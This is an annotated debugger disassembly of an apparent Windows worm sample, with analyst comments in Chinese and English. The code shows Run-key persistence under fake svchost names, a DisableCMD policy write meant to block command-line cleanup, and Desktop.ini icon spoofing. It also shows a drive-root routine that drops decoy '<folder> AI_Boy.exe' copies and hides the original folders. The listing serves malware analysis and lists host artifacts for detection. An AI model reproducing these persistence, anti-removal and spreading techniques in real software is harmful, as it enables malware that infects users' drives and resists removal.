00401CC9 |. 51 push ecx ; /hKey
00401CCA |. FF15 68834300 call dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
00401CD0 |. 3BF4 cmp esi, esp
00401CD2 |. E8 E91E0000 call 00403BC0
00401CD7 |. B9 05000000 mov ecx, 5
00401CDC |. BE 88E24200 mov esi, 0042E288 ; ASCII "C:\windows\svchost.exe"
00401CE1 |. 8DBD D8FEFFFF lea edi, dword ptr [ebp-128]
00401CE7 |. F3:A5 rep movs dword ptr es:[edi], dword p>
00401CE9 |. 66:A5 movs word ptr es:[edi], word ptr [esi>
00401CEB |. A4 movs byte ptr es:[edi], byte ptr [esi>
00401CEC |. B9 3B000000 mov ecx, 3B
00401CF1 |. 33C0 xor eax, eax
00401CF3 |. 8DBD EFFEFFFF lea edi, dword ptr [ebp-111]
00401CF9 |. F3:AB rep stos dword ptr es:[edi]
00401CFB |. AA stos byte ptr es:[edi]
00401CFC |. B9 07000000 mov ecx, 7
00401D01 |. BE 64E24200 mov esi, 0042E264 ; ASCII "C:\windows\system\svchost.exe"
00401D06 |. 8DBD D4FDFFFF lea edi, dword ptr [ebp-22C]
00401D0C |. F3:A5 rep movs dword ptr es:[edi], dword p>
00401D0E |. 66:A5 movs word ptr es:[edi], word ptr [esi>
00401D10 |. B9 39000000 mov ecx, 39
00401D15 |. 33C0 xor eax, eax
00401D17 |. 8DBD F2FDFFFF lea edi, dword ptr [ebp-20E]
00401D1D |. F3:AB rep stos dword ptr es:[edi]
00401D1F |. 66:AB stos word ptr es:[edi]
00401D21 |. C785 D0FDFFFF>mov dword ptr [ebp-230], 0042E22C ; ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
00401D2B |. 8BF4 mov esi, esp
00401D2D |. 8D55 DC lea edx, dword ptr [ebp-24]
00401D30 |. 52 push edx ; /pHandle
00401D31 |. 68 1F000200 push 2001F ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
00401D36 |. 6A 00 push 0 ; |Reserved = 0
00401D38 |. 8B85 D0FDFFFF mov eax, dword ptr [ebp-230] ; |
00401D3E |. 50 push eax ; |Subkey
00401D3F |. 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00401D44 |. FF15 60834300 call dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
00401D4A |. 3BF4 cmp esi, esp
00401D4C |. E8 6F1E0000 call 00403BC0
00401D51 |. 8D8D D8FEFFFF lea ecx, dword ptr [ebp-128]
00401D57 |. 51 push ecx
00401D58 |. E8 E31D0000 call 00403B40
00401D5D |. 83C4 04 add esp, 4
00401D60 |. 8BF4 mov esi, esp
00401D62 |. 50 push eax ; /BufSize
00401D63 |. 8D95 D8FEFFFF lea edx, dword ptr [ebp-128] ; |
00401D69 |. 52 push edx ; |Buffer
00401D6A |. 6A 01 push 1 ; |ValueType = REG_SZ
00401D6C |. 6A 00 push 0 ; |Reserved = 0
00401D6E |. 68 1CE24200 push 0042E21C ; |ValueName = "svchost1.exe"
00401D73 |. 8B45 DC mov eax, dword ptr [ebp-24] ; |
00401D76 |. 50 push eax ; |hKey
00401D77 |. FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \在 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 下添加启动项 "svchost1.exe" = "C:\windows\svchost.exe"（开机自启动，清除时需删除该值）
00401D7D |. 3BF4 cmp esi, esp
00401D7F |. E8 3C1E0000 call 00403BC0
00401D84 |. 8D8D D4FDFFFF lea ecx, dword ptr [ebp-22C]
00401D8A |. 51 push ecx
00401D8B |. E8 B01D0000 call 00403B40
00401D90 |. 83C4 04 add esp, 4
00401D93 |. 8BF4 mov esi, esp
00401D95 |. 50 push eax ; /BufSize
00401D96 |. 8D95 D4FDFFFF lea edx, dword ptr [ebp-22C] ; |
00401D9C |. 52 push edx ; |Buffer
00401D9D |. 6A 01 push 1 ; |ValueType = REG_SZ
00401D9F |. 6A 00 push 0 ; |Reserved = 0
00401DA1 |. 68 0CE24200 push 0042E20C ; |ValueName = "svchost2.exe"
00401DA6 |. 8B45 DC mov eax, dword ptr [ebp-24] ; |
00401DA9 |. 50 push eax ; |hKey
00401DAA |. FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \同一 Run 键下再添加启动项 "svchost2.exe" = "C:\windows\system\svchost.exe"
00401DB0 |. 3BF4 cmp esi, esp
00401DB2 |. E8 091E0000 call 00403BC0
00401DB7 |. 8BF4 mov esi, esp
00401DB9 |. 8B4D DC mov ecx, dword ptr [ebp-24]
00401DBC |. 51 push ecx ; /hKey
00401DBD |. FF15 68834300 call dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
00401DC3 |. 3BF4 cmp esi, esp
00401DC5 |. E8 F61D0000 call 00403BC0
00401DCA |. C785 C8FDFFFF>mov dword ptr [ebp-238], 2
00401DD4 |. C785 C4FDFFFF>mov dword ptr [ebp-23C], 0042E1D8 ; ASCII "Software\Policies\Microsoft\Windows\System"
00401DDE |. 8BF4 mov esi, esp
00401DE0 |. 6A 00 push 0 ; /pDisposition = NULL
00401DE2 |. 8D95 CCFDFFFF lea edx, dword ptr [ebp-234] ; |
00401DE8 |. 52 push edx ; |pHandle
00401DE9 |. 6A 00 push 0 ; |pSecurity = NULL
00401DEB |. 68 3F000F00 push 0F003F ; |Access = KEY_ALL_ACCESS
00401DF0 |. 6A 00 push 0 ; |Options = REG_OPTION_NON_VOLATILE
00401DF2 |. 68 CCE14200 push 0042E1CC ; |Class = "REG_DWORD"
00401DF7 |. 6A 00 push 0 ; |Reserved = 0
00401DF9 |. 8B85 C4FDFFFF mov eax, dword ptr [ebp-23C] ; |
00401DFF |. 50 push eax ; |Subkey
00401E00 |. 68 01000080 push 80000001 ; |hKey = HKEY_CURRENT_USER
00401E05 |. FF15 6C834300 call dword ptr [<&ADVAPI32.RegCreateK>; \RegCreateKeyExA
00401E0B |. 3BF4 cmp esi, esp
00401E0D |. E8 AE1D0000 call 00403BC0
00401E12 |. 8BF4 mov esi, esp
00401E14 |. 6A 04 push 4 ; /BufSize = 4
00401E16 |. 8D8D C8FDFFFF lea ecx, dword ptr [ebp-238] ; |
00401E1C |. 51 push ecx ; |Buffer
00401E1D |. 6A 04 push 4 ; |ValueType = REG_DWORD
00401E1F |. 6A 00 push 0 ; |Reserved = 0
00401E21 |. 68 BCE14200 push 0042E1BC ; |ValueName = "DisableCMD"
00401E26 |. 8B95 CCFDFFFF mov edx, dword ptr [ebp-234] ; |
00401E2C |. 52 push edx ; |hKey
00401E2D |. FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \在 HKCU\Software\Policies\Microsoft\Windows\System 下创建并写入 DisableCMD = REG_DWORD 2（对应组策略"阻止访问命令提示符"；值 2 一般表示禁用 cmd.exe 交互提示符但仍允许批处理脚本——以策略文档为准），目的是妨碍用户用命令行手工清除
00401E33 |. 3BF4 cmp esi, esp
00401E35 |. E8 861D0000 call 00403BC0
00401E3A |. 8BF4 mov esi, esp
00401E3C |. 8B85 CCFDFFFF mov eax, dword ptr [ebp-234]
00401E42 |. 50 push eax ; /hKey
00401E43 |. FF15 68834300 call dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
00401E49 |. 3BF4 cmp esi, esp
00401E4B |. E8 701D0000 call 00403BC0
00401E50 |. 5F pop edi
00401E51 |. 5E pop esi
00401E52 |. 5B pop ebx
00401E53 |. 81C4 7C020000 add esp, 27C
00401E59 |. 3BEC cmp ebp, esp
00401E5B |. E8 601D0000 call 00403BC0
00401E60 |. 8BE5 mov esp, ebp
00401E62 |. 5D pop ebp
00401E63 \. C3 retn
6.获取驱动器类型，遍历磁盘，在目录中写入 Desktop.ini（下面只截取了 GetDriveTypeA、写 Desktop.ini 的子函数，以及 GetLogicalDriveStringsA + FindFirstFileA/FindNextFileA 目录遍历的开头；原文所述"在一级目录下创建同名文件夹.exe 并将原文件夹设为系统隐藏属性"的代码未在本段列出，需在后续代码中确认）
004026A0 /> \55 push ebp
004026A1 |. 8BEC mov ebp, esp
004026A3 |. 83EC 40 sub esp, 40
004026A6 |. 53 push ebx
004026A7 |. 56 push esi
004026A8 |. 57 push edi
004026A9 |. 8D7D C0 lea edi, dword ptr [ebp-40]
004026AC |. B9 10000000 mov ecx, 10
004026B1 |. B8 CCCCCCCC mov eax, CCCCCCCC
004026B6 |. F3:AB rep stos dword ptr es:[edi]
004026B8 |. 8BF4 mov esi, esp
004026BA |. 8B45 08 mov eax, dword ptr [ebp+8]
004026BD |. 50 push eax ; /RootPathName
004026BE |. FF15 D4834300 call dword ptr [<&KERNEL32.GetDriveTy>; \获取驱动器类型
004027A0 /> \55 push ebp
004027A1 |. 8BEC mov ebp, esp
004027A3 |. 81EC 84010000 sub esp, 184
004027A9 |. 53 push ebx
004027AA |. 56 push esi
004027AB |. 57 push edi
004027AC |. 8DBD 7CFEFFFF lea edi, dword ptr [ebp-184]
004027B2 |. B9 61000000 mov ecx, 61
004027B7 |. B8 CCCCCCCC mov eax, CCCCCCCC
004027BC |. F3:AB rep stos dword ptr es:[edi]
004027BE |. 8BF4 mov esi, esp
004027C0 |. 8B45 08 mov eax, dword ptr [ebp+8]
004027C3 |. 50 push eax ; /<%s>
004027C4 |. 68 34E54200 push 0042E534 ; |Format = "%s\Desktop.ini"
004027C9 |. 8D8D FCFEFFFF lea ecx, dword ptr [ebp-104] ; |
004027CF |. 51 push ecx ; |s
004027D0 |. FF15 14864300 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
004027D6 |. 83C4 0C add esp, 0C
004027D9 |. 3BF4 cmp esi, esp
004027DB |. E8 E0130000 call 00403BC0
004027E0 |. B9 0C000000 mov ecx, 0C
004027E5 |. BE F4E44200 mov esi, 0042E4F4 ; "[.ShellClassInfo]",LF,"IconFile=Recycle.exe",LF,"IconIndex=0"
004027EA |. 8DBD C0FEFFFF lea edi, dword ptr [ebp-140]
004027F0 |. F3:A5 rep movs dword ptr es:[edi], dword p>
004027F2 |. 66:A5 movs word ptr es:[edi], word ptr [esi>
004027F4 |. A4 movs byte ptr es:[edi], byte ptr [esi>
004027F5 |. C785 F8FEFFFF>mov dword ptr [ebp-108], 33
004027FF |. 8BF4 mov esi, esp
00402801 |. 6A 00 push 0 ; /hTemplateFile = NULL
00402803 |. 6A 06 push 6 ; |Attributes = HIDDEN|SYSTEM
00402805 |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS
00402807 |. 6A 00 push 0 ; |pSecurity = NULL
00402809 |. 6A 00 push 0 ; |ShareMode = 0
0040280B |. 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
00402810 |. 8D95 FCFEFFFF lea edx, dword ptr [ebp-104] ; |
00402816 |. 52 push edx ; |FileName
00402817 |. FF15 14844300 call dword ptr [<&KERNEL32.CreateFile>; \在参数 [ebp+8] 指定的目录下创建 "<目录>\Desktop.ini"（路径由 004027C4 的格式串 "%s\Desktop.ini" 生成，并非固定在 c:\windows）；CREATE_ALWAYS 会覆盖该目录原有的 Desktop.ini，属性为 HIDDEN|SYSTEM
0040281D |. 3BF4 cmp esi, esp
0040281F |. E8 9C130000 call 00403BC0
00402824 |. 8985 BCFEFFFF mov dword ptr [ebp-144], eax
0040282A |. 8BF4 mov esi, esp
0040282C |. 6A 00 push 0 ; /pOverlapped = NULL
0040282E |. 8D85 F4FEFFFF lea eax, dword ptr [ebp-10C] ; |
00402834 |. 50 push eax ; |pBytesWritten
00402835 |. 8B8D F8FEFFFF mov ecx, dword ptr [ebp-108] ; |
0040283B |. 83E9 01 sub ecx, 1 ; |
0040283E |. 51 push ecx ; |nBytesToWrite
0040283F |. 8D95 C0FEFFFF lea edx, dword ptr [ebp-140] ; |
00402845 |. 52 push edx ; |Buffer
00402846 |. 8B85 BCFEFFFF mov eax, dword ptr [ebp-144] ; |
0040284C |. 50 push eax ; |hFile
0040284D |. FF15 D8834300 call dword ptr [<&KERNEL32.WriteFile>>; \WriteFile 写入 0x33-1 = 50 字节（不含结尾 NUL），内容为三行：[.ShellClassInfo] / IconFile=Recycle.exe / IconIndex=0——让该目录在资源管理器中显示 Recycle.exe 的图标，配合被破坏的"隐藏扩展名"设置，伪装目录与真实程序难以区分
00402853 |. 3BF4 cmp esi, esp
00402855 |. E8 66130000 call 00403BC0
0040285A |. 8BF4 mov esi, esp
0040285C |. 6A 06 push 6 ; /FileAttributes = HIDDEN|SYSTEM
0040285E |. 8D8D FCFEFFFF lea ecx, dword ptr [ebp-104] ; |
00402864 |. 51 push ecx ; |FileName
00402865 |. FF15 C4834300 call dword ptr [<&KERNEL32.SetFileAtt>; \设置文件为隐藏和系统属性
; ---------------------------------------------------------------------------
; sub_00401F10 -- drive-root propagation routine (no arguments; eax at retn is
; whatever the last call left, no return value is set up)
; For every logical drive root "X:\" it lists the root directory once (no
; recursion into subfolders is visible in this routine) and, per entry:
;   * directory (attribute 0x10): builds "X:\<dir> AI_Boy.exe" and
;     "<...>\Recycle.exe", copies C:\WINDOWS\svchost.exe and
;     C:\WINDOWS\system\svchost.exe onto those names (CopyFileA, overwrite
;     allowed, return value never checked), leaves the "<dir> AI_Boy.exe" decoy
;     NORMAL and marks the folder and Recycle.exe HIDDEN|SYSTEM. Names longer
;     than 100 characters take a separate branch (0040229D) that truncates.
;   * file whose name ends in lowercase "exe": passes "X:\<file>" to thunk 0040100A.
; Helpers 00403B40 / 00403C90 / 00403A40 / 00403C30 are cdecl routines whose
; bodies are not in this listing; their roles below are inferred from argument
; shape and marked as such. 00403BC0 after "cmp esi, esp" is a per-call
; stack-pointer check (presumably the debug CRT _chkesp stub -- TODO confirm).
; NOTE(review): "C:\WINDOWS\svchost.exe" / "C:\WINDOWS\system\svchost.exe" are
; not the legitimate System32 location -- presumably copies dropped earlier by
; the sample (not shown here). Host artifacts to look for: "<folder> AI_Boy.exe"
; beside hidden+system folders, hidden "Recycle.exe" inside them.
; ---------------------------------------------------------------------------
00401F10 /> \55 push ebp
00401F11 |. 8BEC mov ebp, esp
00401F13 |. 81EC A80C0000 sub esp, 0CA8 ; 0xCA8 bytes of locals: path buffers plus WIN32_FIND_DATAA at ebp-750
00401F19 |. 53 push ebx
00401F1A |. 56 push esi
00401F1B |. 57 push edi
00401F1C |. 8DBD 58F3FFFF lea edi, dword ptr [ebp-CA8]
00401F22 |. B9 2A030000 mov ecx, 32A ; 0x32A dwords = 0xCA8 bytes
00401F27 |. B8 CCCCCCCC mov eax, CCCCCCCC
00401F2C |. F3:AB rep stos dword ptr es:[edi] ; fill the whole frame with 0xCC (debug-build style local fill)
00401F2E |. 8BF4 mov esi, esp ; esi = esp snapshot for the stack-pointer check after the next API call
00401F30 |. 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
00401F36 |. 50 push eax ; /Buffer = ebp-104, receives "C:\<0>D:\<0>...<0>"
00401F37 |. 68 04010000 push 104 ; |BufSize = 104 (260.)
00401F3C |. FF15 D0834300 call dword ptr [<&KERNEL32.GetLogical>; \GetLogicalDriveStringsA: list drive roots; eax = characters written
00401F42 |. 3BF4 cmp esi, esp
00401F44 |. E8 771C0000 call 00403BC0 ; stack-pointer check (repeated after every API call below)
00401F49 |. 8985 F4F9FFFF mov dword ptr [ebp-60C], eax ; [ebp-60C] = length of the drive-string list
00401F4F |. 8BF4 mov esi, esp
00401F51 |. 8B8D F4F9FFFF mov ecx, dword ptr [ebp-60C]
00401F57 |. 51 push ecx ; /<%d> = list length
00401F58 |. 68 D4E44200 push 0042E4D4 ; |Format = "%d"
00401F5D |. 8D95 F8F9FFFF lea edx, dword ptr [ebp-608] ; |
00401F63 |. 52 push edx ; |s = ebp-608
00401F64 |. FF15 14864300 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA: decimal string of the length; ebp-608 is not read again in this routine
00401F6A |. 83C4 0C add esp, 0C
00401F6D |. 3BF4 cmp esi, esp
00401F6F |. E8 4C1C0000 call 00403BC0
00401F74 |. C785 F0F9FFFF>mov dword ptr [ebp-610], 0 ; [ebp-610] = i, byte offset into the drive list
00401F7E |. EB 0F jmp short 00401F8F
00401F80 |> 8B85 F0F9FFFF /mov eax, dword ptr [ebp-610] ; next drive: i += 4 (each entry is "X:\" plus NUL)
00401F86 |. 83C0 04 |add eax, 4
00401F89 |. 8985 F0F9FFFF |mov dword ptr [ebp-610], eax
00401F8F |> 8B8D F0F9FFFF mov ecx, dword ptr [ebp-610]
00401F95 |. 3B8D F4F9FFFF |cmp ecx, dword ptr [ebp-60C]
00401F9B |. 0F84 5C050000 |je 004024FD ; i == length -> all drives done, go to epilogue
00401FA1 |. 8B95 F0F9FFFF |mov edx, dword ptr [ebp-610]
00401FA7 |. 0FBE8415 FEFE>|movsx eax, byte ptr [ebp+edx-102] ; drive[i+2] ('\')
00401FAF |. 8BF4 |mov esi, esp
00401FB1 |. 50 |push eax ; /<%c> = drive[i+2]
00401FB2 |. 8B8D F0F9FFFF |mov ecx, dword ptr [ebp-610] ; |
00401FB8 |. 0FBE940D FDFE>|movsx edx, byte ptr [ebp+ecx-103] ; | drive[i+1] (':')
00401FC0 |. 52 |push edx ; |<%c> = drive[i+1]
00401FC1 |. 8B85 F0F9FFFF |mov eax, dword ptr [ebp-610] ; |
00401FC7 |. 0FBE8C05 FCFE>|movsx ecx, byte ptr [ebp+eax-104] ; | drive[i] (drive letter)
00401FCF |. 51 |push ecx ; |<%c> = drive[i]
00401FD0 |. 68 CCE44200 |push 0042E4CC ; |Format = "%c%c%c"
00401FD5 |. 8D95 F8FDFFFF |lea edx, dword ptr [ebp-208] ; |
00401FDB |. 52 |push edx ; |s = ebp-208
00401FDC |. FF15 14864300 |call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA: ebp-208 = "X:\" (root of the current drive)
00401FE2 |. 83C4 14 |add esp, 14
00401FE5 |. 3BF4 |cmp esi, esp
00401FE7 |. E8 D41B0000 |call 00403BC0
00401FEC |. 68 C8E44200 |push 0042E4C8 ; ASCII "*.*"
00401FF1 |. 8D85 F8FDFFFF |lea eax, dword ptr [ebp-208]
00401FF7 |. 50 |push eax
00401FF8 |. E8 931C0000 |call 00403C90 ; cdecl(ebp-208, "*.*"); presumably strcat, giving "X:\*.*" -- TODO confirm
00401FFD |. 83C4 08 |add esp, 8
00402000 |. 8BF4 |mov esi, esp
00402002 |. 8D8D B0F8FFFF |lea ecx, dword ptr [ebp-750]
00402008 |. 51 |push ecx ; /pFindFileData = ebp-750 (WIN32_FIND_DATAA; cFileName at +2C = ebp-724)
00402009 |. 8D95 F8FDFFFF |lea edx, dword ptr [ebp-208] ; |
0040200F |. 52 |push edx ; |FileName = "X:\*.*"
00402010 |. FF15 CC834300 |call dword ptr [<&KERNEL32.FindFirst>; \FindFirstFileA: enumerate the drive root only (no subdirectory recursion here)
00402016 |. 3BF4 |cmp esi, esp
00402018 |. E8 A31B0000 |call 00403BC0
0040201D |. 8985 ACF8FFFF |mov dword ptr [ebp-754], eax ; [ebp-754] = search handle
00402023 |. 83BD ACF8FFFF>|cmp dword ptr [ebp-754], -1
0040202A |. 75 05 |jnz short 00402031
0040202C |.^ E9 4FFFFFFF |jmp 00401F80 ; INVALID_HANDLE_VALUE -> skip this drive
00402031 |> C685 FBFDFFFF>|mov byte ptr [ebp-205], 0 ; NUL at ebp-208+3: pattern buffer reverts to "X:\"
00402038 |> 8BF4 |/mov esi, esp
0040203A |. 8D85 B0F8FFFF ||lea eax, dword ptr [ebp-750]
00402040 |. 50 ||push eax ; /pFindFileData
00402041 |. 8B8D ACF8FFFF ||mov ecx, dword ptr [ebp-754] ; |
00402047 |. 51 ||push ecx ; |hFile
00402048 |. FF15 C8834300 ||call dword ptr [<&KERNEL32.FindNext>; \FindNextFileA: the entry returned by FindFirstFileA itself is never processed; the loop starts with the second entry
0040204E |. 3BF4 ||cmp esi, esp
00402050 |. E8 6B1B0000 ||call 00403BC0
00402055 |. 85C0 ||test eax, eax
00402057 |. 0F84 85040000 ||je 004024E2 ; no more entries -> FindClose, next drive
0040205D |. 8B95 B0F8FFFF ||mov edx, dword ptr [ebp-750] ; dwFileAttributes
00402063 |. 83E2 10 ||and edx, 10 ; FILE_ATTRIBUTE_DIRECTORY
00402066 |. 85D2 ||test edx, edx
00402068 |. 0F84 A3030000 ||je 00402411 ; not a directory -> file branch at 00402411
0040206E |. 8D85 DCF8FFFF ||lea eax, dword ptr [ebp-724]
00402074 |. 50 ||push eax
00402075 |. E8 C61A0000 ||call 00403B40 ; cdecl(cFileName); result used as a length below, presumably strlen -- TODO confirm
0040207A |. 83C4 04 ||add esp, 4
0040207D |. 83F8 64 ||cmp eax, 64
00402080 |. 0F87 17020000 ||ja 0040229D ; directory name longer than 100 chars -> truncating branch at 0040229D
00402086 |. 8BF4 ||mov esi, esp
00402088 |. 8D8D DCF8FFFF ||lea ecx, dword ptr [ebp-724]
0040208E |. 51 ||push ecx ; /<%s> = cFileName
0040208F |. 8D95 F8FDFFFF ||lea edx, dword ptr [ebp-208] ; |
00402095 |. 52 ||push edx ; |<%s> = "X:\"
00402096 |. 68 44E44200 ||push 0042E444 ; |Format = "%s%s AI_Boy.exe"
0040209B |. 8D85 A8F7FFFF ||lea eax, dword ptr [ebp-858] ; |
004020A1 |. 50 ||push eax ; |s = ebp-858
004020A2 |. FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA: ebp-858 = "X:\<dir> AI_Boy.exe" (decoy executable named after the folder)
004020A8 |. 83C4 10 ||add esp, 10
004020AB |. 3BF4 ||cmp esi, esp
004020AD |. E8 0E1B0000 ||call 00403BC0
004020B2 |. 8BF4 ||mov esi, esp
004020B4 |. 8D8D DCF8FFFF ||lea ecx, dword ptr [ebp-724]
004020BA |. 51 ||push ecx ; /<%s> = cFileName
004020BB |. 8D95 F8FDFFFF ||lea edx, dword ptr [ebp-208] ; |
004020C1 |. 52 ||push edx ; |<%s> = "X:\"
004020C2 |. 68 3CE44200 ||push 0042E43C ; |Format = "%s%s"
004020C7 |. 8D85 A4F6FFFF ||lea eax, dword ptr [ebp-95C] ; |
004020CD |. 50 ||push eax ; |s = ebp-95C
004020CE |. FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA: ebp-95C = "X:\<dir>" (full path of the original folder)
004020D4 |. 83C4 10 ||add esp, 10
004020D7 |. 3BF4 ||cmp esi, esp
004020D9 |. E8 E21A0000 ||call 00403BC0
004020DE |. 8D8D A4F6FFFF ||lea ecx, dword ptr [ebp-95C]
004020E4 |. 51 ||push ecx
004020E5 |. E8 1BEFFFFF ||call 00401005 ; thunk taking the folder path; its target is not in this listing, so what it does to the folder is unknown here
004020EA |. 83C4 04 ||add esp, 4
004020ED |. 8BF4 ||mov esi, esp
004020EF |. 8D95 A4F6FFFF ||lea edx, dword ptr [ebp-95C]
004020F5 |. 52 ||push edx ; /<%s> = "X:\<dir>"
004020F6 |. 68 F0E04200 ||push 0042E0F0 ; |Format = "%s.exe AI_Boy...." (string shown truncated by the debugger; full text not visible here)
004020FB |. 8D85 9CF4FFFF ||lea eax, dword ptr [ebp-B64] ; |
00402101 |. 50 ||push eax ; |s = ebp-B64
00402102 |. FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA: ebp-B64 = new name derived from the folder path
00402108 |. 83C4 0C ||add esp, 0C
0040210B |. 3BF4 ||cmp esi, esp
0040210D |. E8 AE1A0000 ||call 00403BC0
00402112 |. 8D8D 9CF4FFFF ||lea ecx, dword ptr [ebp-B64]
00402118 |. 51 ||push ecx
00402119 |. 8D95 A4F6FFFF ||lea edx, dword ptr [ebp-95C]
0040211F |. 52 ||push edx
00402120 |. E8 0B1B0000 ||call 00403C30 ; cdecl(old = "X:\<dir>", new = ebp-B64); followed by a GetLastError check, so presumably a rename/move of the folder -- TODO confirm
00402125 |. 83C4 08 ||add esp, 8
00402128 |. 8BF4 ||mov esi, esp
0040212A |. FF15 E0834300 ||call dword ptr [<&KERNEL32.GetLastE>; [GetLastError
00402130 |. 3BF4 ||cmp esi, esp
00402132 |. E8 891A0000 ||call 00403BC0
00402137 |. 85C0 ||test eax, eax
00402139 |. 0F85 AF000000 ||jnz 004021EE ; error -> fallback path (004021EE) that hides the ORIGINAL folder name instead
0040213F |. 8BF4 ||mov esi, esp
00402141 |. 8D85 9CF4FFFF ||lea eax, dword ptr [ebp-B64]
00402147 |. 50 ||push eax ; /<%s> = ebp-B64
00402148 |. 68 28E44200 ||push 0042E428 ; |Format = "%s\Recycle.exe"
0040214D |. 8D8D A0F5FFFF ||lea ecx, dword ptr [ebp-A60] ; |
00402153 |. 51 ||push ecx ; |s = ebp-A60
00402154 |. FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA: ebp-A60 = "<ebp-B64>\Recycle.exe"
0040215A |. 83C4 0C ||add esp, 0C
0040215D |. 3BF4 ||cmp esi, esp
0040215F |. E8 5C1A0000 ||call 00403BC0
00402164 |. 8BF4 ||mov esi, esp
00402166 |. 6A 00 ||push 0 ; /FailIfExists = FALSE (existing file is overwritten)
00402168 |. 8D95 A8F7FFFF ||lea edx, dword ptr [ebp-858] ; |
0040216E |. 52 ||push edx ; |NewFileName = "X:\<dir> AI_Boy.exe"
0040216F |. 68 301A4300 ||push 00431A30 ; |ExistingFileName = "C:\WINDOWS\svchost.exe"
00402174 |. FF15 18844300 ||call dword ptr [<&KERNEL32.CopyFile>; \CopyFileA: drop the payload as "<dir> AI_Boy.exe" beside the folder (return value not checked)
0040217A |. 3BF4 ||cmp esi, esp
0040217C |. E8 3F1A0000 ||call 00403BC0
00402181 |. 8BF4 ||mov esi, esp
00402183 |. 6A 00 ||push 0 ; /FailIfExists = FALSE
00402185 |. 8D85 A0F5FFFF ||lea eax, dword ptr [ebp-A60] ; |
0040218B |. 50 ||push eax ; |NewFileName = "<ebp-B64>\Recycle.exe"
0040218C |. 68 341B4300 ||push 00431B34 ; |ExistingFileName = "C:\WINDOWS\system\svchost.exe"
00402191 |. FF15 18844300 ||call dword ptr [<&KERNEL32.CopyFile>; \CopyFileA: second payload copy inside the folder
00402197 |. 3BF4 ||cmp esi, esp
00402199 |. E8 221A0000 ||call 00403BC0
0040219E |. 8BF4 ||mov esi, esp
004021A0 |. 68 80000000 ||push 80 ; /FileAttributes = NORMAL
004021A5 |. 8D8D A8F7FFFF ||lea ecx, dword ptr [ebp-858] ; |
004021AB |. 51 ||push ecx ; |FileName = "X:\<dir> AI_Boy.exe"
004021AC |. FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA: the decoy stays visible
004021B2 |. 3BF4 ||cmp esi, esp
004021B4 |. E8 071A0000 ||call 00403BC0
004021B9 |. 8BF4 ||mov esi, esp
004021BB |. 6A 06 ||push 6 ; /FileAttributes = HIDDEN|SYSTEM
004021BD |. 8D95 9CF4FFFF ||lea edx, dword ptr [ebp-B64] ; |
004021C3 |. 52 ||push edx ; |FileName = ebp-B64 (renamed folder)
004021C4 |. FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA: hide the folder so only the decoy .exe is shown
004021CA |. 3BF4 ||cmp esi, esp
004021CC |. E8 EF190000 ||call 00403BC0
004021D1 |. 8BF4 ||mov esi, esp
004021D3 |. 6A 06 ||push 6 ; /FileAttributes = HIDDEN|SYSTEM
004021D5 |. 8D85 A0F5FFFF ||lea eax, dword ptr [ebp-A60] ; |
004021DB |. 50 ||push eax ; |FileName = "...\Recycle.exe"
004021DC |. FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA: hide Recycle.exe
004021E2 |. 3BF4 ||cmp esi, esp
004021E4 |. E8 D7190000 ||call 00403BC0
004021E9 |. E9 AA000000 ||jmp 00402298
004021EE |> 8BF4 ||mov esi, esp ; --- fallback when GetLastError != 0 after 00403C30: same drops, but the folder hidden is ebp-95C (original name)
004021F0 |. 8D8D 9CF4FFFF ||lea ecx, dword ptr [ebp-B64]
004021F6 |. 51 ||push ecx ; /<%s> = ebp-B64
004021F7 |. 68 28E44200 ||push 0042E428 ; |Format = "%s\Recycle.exe"
004021FC |. 8D95 A0F5FFFF ||lea edx, dword ptr [ebp-A60] ; |
00402202 |. 52 ||push edx ; |s = ebp-A60
00402203 |. FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA: ebp-A60 = "<ebp-B64>\Recycle.exe" (still built from the new name even though the rename failed)
00402209 |. 83C4 0C ||add esp, 0C
0040220C |. 3BF4 ||cmp esi, esp
0040220E |. E8 AD190000 ||call 00403BC0
00402213 |. 8BF4 ||mov esi, esp
00402215 |. 6A 00 ||push 0 ; /FailIfExists = FALSE
00402217 |. 8D85 A8F7FFFF ||lea eax, dword ptr [ebp-858] ; |
0040221D |. 50 ||push eax ; |NewFileName = "X:\<dir> AI_Boy.exe"
0040221E |. 68 301A4300 ||push 00431A30 ; |ExistingFileName = "C:\WINDOWS\svchost.exe"
00402223 |. FF15 18844300 ||call dword ptr [<&KERNEL32.CopyFile>; \CopyFileA
00402229 |. 3BF4 ||cmp esi, esp
0040222B |. E8 90190000 ||call 00403BC0
00402230 |. 8BF4 ||mov esi, esp
00402232 |. 6A 00 ||push 0 ; /FailIfExists = FALSE
00402234 |. 8D8D A0F5FFFF ||lea ecx, dword ptr [ebp-A60] ; |
0040223A |. 51 ||push ecx ; |NewFileName = "<ebp-B64>\Recycle.exe"
0040223B |. 68 341B4300 ||push 00431B34 ; |ExistingFileName = "C:\WINDOWS\system\svchost.exe"
00402240 |. FF15 18844300 ||call dword ptr [<&KERNEL32.CopyFile>; \CopyFileA
